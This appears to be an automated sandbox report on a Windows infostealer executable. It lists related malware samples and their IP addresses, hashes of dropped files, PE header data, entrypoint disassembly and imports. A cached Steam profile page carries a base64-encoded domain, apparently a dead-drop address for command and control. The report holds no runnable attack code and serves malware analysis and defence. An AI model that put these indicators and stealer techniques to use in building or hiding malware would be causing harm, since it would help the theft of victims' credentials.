                                                                                                                                                                                          MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 23.55.153.106

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          CLOUDFLARENETUSvj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.20.99.10
                                                                                                                                                                                          vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.20.99.10
                                                                                                                                                                                          dropper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                                          1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 172.67.144.62
                                                                                                                                                                                          https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                          setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.21.30.45
                                                                                                                                                                                          U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                          • 104.21.38.84
                                                                                                                                                                                          rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                          AKAMAI-ASUSsetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 23.217.49.150
                                                                                                                                                                                          decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                          decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                          FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.34.241
                                                                                                                                                                                          decrypt.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                          Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          • 104.102.49.254

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e190000000000000000.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          0000000000000000.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                          setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                          • 188.114.96.3

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_OXoeX1Ii3x.exe_ff6e839fbc87f846dac04b4093999c48a66e696_6a8cdeb1_f967174d-e0fb-4f62-a551-ef34d0073e2b\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):1.0180438971405563
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:rtsB7d6uq0CH0MnjenvJzuiFAZ24IO8+H:RsH6uxCUMnjIzuiFAY4IO8+H
                                                                                                                                                                                          MD5:42045DF8D3A2A47425FB7C4B17525312
                                                                                                                                                                                          SHA1:62A8B96E74EA284C634405543C6CF93BB9B35619
                                                                                                                                                                                          SHA-256:2AACDA55F39517AAE835DAA92FA2F1AC4FAD659159C430A7AD407D6171EE94CA
                                                                                                                                                                                          SHA-512:B36E04D792185D0EAC4C97CF4870ADD847CB1D750013AA0A6C3302046A8C56147B4AE2252F303AD4EACCDCCCFEC978B3EF7375451F494782BE676893F80FA9FD
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.9.2.7.2.7.1.9.9.5.6.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.9.2.7.2.7.7.1.5.1.9.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.6.7.1.7.4.d.-.e.0.f.b.-.4.f.6.2.-.a.5.5.1.-.e.f.3.4.d.0.0.7.3.e.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.5.6.5.1.a.b.-.5.0.7.2.-.4.0.b.d.-.8.c.4.2.-.8.d.e.8.c.f.9.c.7.8.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.X.o.e.X.1.I.i.3.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.2.c.-.0.0.0.1.-.0.0.1.4.-.5.6.4.7.-.3.2.d.7.2.4.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.2.2.9.7.b.9.5.8.7.7.0.8.4.1.d.b.f.2.e.5.a.9.0.4.5.1.5.b.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.3.7.0.2.4.4.6.6.9.d.a.e.a.5.f.8.7.c.7.9.7.d.6.a.d.2.4.0.a.d.b.f.b.7.0.0.6.3.8.4.!.O.X.o.e.X.1.I.i.3.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER74E.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Wed Jan 1 08:12:07 2025, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):125822
                                                                                                                                                                                          Entropy (8bit):1.8987646251592072
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:IB3i7abJaCkmy4JG+1aebibaoH6JGlEJ:u3i6nkmxHawIr6klEJ
                                                                                                                                                                                          MD5:CF93D625BE9B3486D4E1715A0CDA1D96
                                                                                                                                                                                          SHA1:CEBABDBCEF76317B8C2C6C346AB87B5D3F5D1100
                                                                                                                                                                                          SHA-256:B9291CF43095FB1DF395607A6F633AAE3790328408A75CCEBA4D834028ED46A5
                                                                                                                                                                                          SHA-512:00A3585F3952D8CEAF064F77870805522439FB1BA415DB4A04ED891C26D972B321BC3BC6AF50D3847A27C539ED7C44DDCB79C81A7A9E2ACD8F4799BCFB144932
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:MDMP..a..... .........tg........................T...........d...hM..........T.......8...........T............N..v...........p"..........\$..............................................................................eJ.......$......GenuineIntel............T.......,.....tg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER868.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8378
                                                                                                                                                                                          Entropy (8bit):3.694794779443622
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJjia6An6YEIPSUsrgmfw2pqpDQ89b/basfNFjm:R6lXJjf6An6YEgSUsrgmfw9/b5fv6
                                                                                                                                                                                          MD5:0A3FC6D274F764AE602198D343A6D1E5
                                                                                                                                                                                          SHA1:FF2D00A400BDF412BFA8E99993B4E4C7FDA1924A
                                                                                                                                                                                          SHA-256:F0FD7B61AA4A9876E044FB5E5159865E10CAB67CDFDD28105B05CD4476FC3CD4
                                                                                                                                                                                          SHA-512:FE859EBBA787FA69171DD38414A195528D26ED2757CD2B7F5DA94E3035493D7D18BD9676226CC4C579F9388F9C9063805B071C63C6C9D815FD6AFD657E294663
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.9.6.<./.P.i.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER888.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4680
                                                                                                                                                                                          Entropy (8bit):4.460595701421241
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs7Jg77aI9NCbrWpW8VYj4Ym8M4JArLirnFo+q8vWrLirH9m1o30d:uIjfVI76ba7V0JArmrmKWrmrdV30d
                                                                                                                                                                                          MD5:0CCA0F6B9FD8E88EFA38EC167A5902AF
                                                                                                                                                                                          SHA1:86CC23419E21CCE2AEFE4EB55D03A4673442F0C4
                                                                                                                                                                                          SHA-256:E0D449F7DC907617992349D9F98D5C5B0DE4446745D15B8E9F6D498E4E022F99
                                                                                                                                                                                          SHA-512:F83336E97E5E47EC8A8D70AA53D763925A50286260B4393C180366C6DCCFDC8B6E343C766923090CA077F429202C09F558F74B61BC0B6BC56E591EC9E0C80A0B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="656594" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199619938930[1].htm

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3188)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):35137
                                                                                                                                                                                          Entropy (8bit):5.372744245762644
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:7fBpqhYGM4evx83TfwtuXNS3F4aXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYH:DB8hYGM4evx83TfwtuX84aXfsW9l+X9c
                                                                                                                                                                                          MD5:1E7DEB0EF5026870E7193ECDE39318E1
                                                                                                                                                                                          SHA1:F0A95CEF0DC52C0C14562031237A677DD764FD7D
                                                                                                                                                                                          SHA-256:58DD9DACBE007647AC9DF7B0C0922014F8752AEB107A1946ABA73236096CABAA
                                                                                                                                                                                          SHA-512:C4E192A4C181BAB9FAD80660ECB4158F8B4DA7A700C8635538CA5C700CB651E64D0415E771108929E6CF9B307EB39CFC6B6085E8C56961843A545BB3811096BB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: 3e3 bGxhbC54eXo=4e4</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cdn=fastly" re

                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                          Entropy (8bit):4.421553804709631
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:USvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNE0uhiTw:fvloTMW+EZMM6DFyG03w
                                                                                                                                                                                          MD5:C516BB8D4FE8011115BEE0D5871D400D
                                                                                                                                                                                          SHA1:AF5BD590DFCAE41C7C5EA36F4B8868960569B4AD
                                                                                                                                                                                          SHA-256:AF3843E1AFE6AE292D5E2B1CFD571F1ACAF76D6281EA3BE77E0B87DA497B31EA
                                                                                                                                                                                          SHA-512:7A4DD3D21DB4E8F2AC5A14D5EE262F36C74C314C3372E55BBDC60D1C26734D192996D8527BBDF647466588BAB53B72532140768EBEB2E18440D68202320DD611
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.'E.$\................................................................................................................................................................................................................................................................................................................................................R.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):6.544491165544845
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:OXoeX1Ii3x.exe
                                                                                                                                                                                          File size:378'368 bytes
                                                                                                                                                                                          MD5:3e9881b9c6ff4994fc9d684456694e77
                                                                                                                                                                                          SHA1:370244669daea5f87c797d6ad240adbfb7006384
                                                                                                                                                                                          SHA256:a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
                                                                                                                                                                                          SHA512:7b9c266baac07d919376931191ec5ba861ea747cce2a080ddfff3d76067c5125b75618d579db55a3458309743cbe12a75aa76feb1a1a9f5397eed9aa87b0a996
                                                                                                                                                                                          SSDEEP:6144:HSD7bIFLWv34AH9i1Bb5bB3JymF5siEy+GFafYJdWFN+VK:2YQLo1BtWmhEIJovsK
                                                                                                                                                                                          TLSH:29849C32B945E432D16202311F5DDBB5AA7DB1700FB218CBB3E45E6DAEB46C09231F66
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t.......t......1t.......t..O....t..O....t..O....t.......t...t...t..~....t..~....t..Rich.t..........PE..L...w.Xf...

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Entrypoint:0x41d1a0
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x6658D677 [Thu May 30 19:41:43 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:64cf79ceef6f212e81ad5276c01ae859

                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                          Instruction
                                                                                                                                                                                          call 00007FD5C0CBFF15h
                                                                                                                                                                                          jmp 00007FD5C0CBF8CDh
                                                                                                                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                          mov dword ptr [ecx+04h], 00446B48h
                                                                                                                                                                                          mov dword ptr [ecx], 00446B40h
                                                                                                                                                                                          ret
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          sub esp, 0Ch
                                                                                                                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                          call 00007FD5C0CBFA3Fh
                                                                                                                                                                                          push 004572E4h
                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                          push eax
                                                                                                                                                                                          call 00007FD5C0CC2B85h
                                                                                                                                                                                          int3
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          and dword ptr [0045A5D8h], 00000000h
                                                                                                                                                                                          sub esp, 24h
                                                                                                                                                                                          or dword ptr [00459084h], 01h
                                                                                                                                                                                          push 0000000Ah
                                                                                                                                                                                          call dword ptr [004460A0h]
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007FD5C0CBFC12h
                                                                                                                                                                                          and dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          push esi
                                                                                                                                                                                          push edi
                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                          lea edi, dword ptr [ebp-24h]
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          cpuid
                                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                                          pop ebx
                                                                                                                                                                                          nop
                                                                                                                                                                                          mov dword ptr [edi], eax
                                                                                                                                                                                          mov dword ptr [edi+04h], esi
                                                                                                                                                                                          mov dword ptr [edi+08h], ecx
                                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                                          mov dword ptr [edi+0Ch], edx
                                                                                                                                                                                          mov eax, dword ptr [ebp-24h]
                                                                                                                                                                                          mov edi, dword ptr [ebp-20h]
                                                                                                                                                                                          mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                          xor edi, 756E6547h
                                                                                                                                                                                          mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                          xor eax, 49656E69h
                                                                                                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                                                                                                          mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                          xor eax, 6C65746Eh
                                                                                                                                                                                          mov dword ptr [ebp-08h], eax
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          inc eax
                                                                                                                                                                                          push ebx
                                                                                                                                                                                          cpuid
                                                                                                                                                                                          mov esi, ebx
                                                                                                                                                                                          pop ebx
                                                                                                                                                                                          nop
                                                                                                                                                                                          lea ebx, dword ptr [ebp-24h]
                                                                                                                                                                                          mov dword ptr [ebx], eax
                                                                                                                                                                                          mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                          or eax, dword ptr [ebp-08h]
                                                                                                                                                                                          or eax, edi
                                                                                                                                                                                          mov dword ptr [ebx+04h], esi
                                                                                                                                                                                          mov dword ptr [ebx+08h], ecx

                                                                                                                                                                                          Data Directories

                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x57f400x8c.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000x37bc.reloc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x513d00x38.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x513100x40.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x460000x1a4.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                          Sections

                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          .text0x10000x44a0a0x44c008d7060d73bc148599fa8d6329daec2edFalse0.5540056818181818data6.635307481318297IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rdata0x460000x128da0x12a00514b84d1c41bc5ae9a4f2bd0b693bec4False0.4049522860738255data4.9965728381036545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .data0x590000x22480x140071b16004b0d569191cb890591629e3c2False0.1845703125DOS executable (block device driver)3.3917146849602275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .reloc0x5c0000x37bc0x38003f1d3462bb72b406a84416993d5de400False0.7054268973214286data6.597143871177635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                          Imports

                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          KERNEL32.dllMultiByteToWideChar, FindFirstFileA, HeapFree, OutputDebugStringA, FindNextFileA, lstrlenA, FindClose, Sleep, GetTempPathA, HeapAlloc, GetProcessHeap, GetNativeSystemInfo, WriteFile, SetFilePointer, CreateFileA, CloseHandle, ExitProcess, TerminateProcess, WaitForSingleObject, OpenProcess, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, GetCurrentProcessId, WideCharToMultiByte, HeapSize, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, ReadConsoleW, GetFileSizeEx, HeapReAlloc, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, InitializeCriticalSectionEx, GetProcAddress, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, SetEndOfFile, CreateFileW, GetFileType, ReadFile, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, GetCommandLineA, GetCommandLineW, SetStdHandle, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FlushFileBuffers, WriteConsoleW
                                                                                                                                                                                          USER32.dllFindWindowA
                                                                                                                                                                                          SHELL32.dllSHGetFolderPathA
                                                                                                                                                                                          WININET.dllInternetWriteFile
                                                                                                                                                                                          SHLWAPI.dllPathMatchSpecA
                                                                                                                                                                                          RstrtMgr.DLLRmGetList, RmRegisterResources, RmStartSession, RmEndSession

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Suricata IDS Alerts

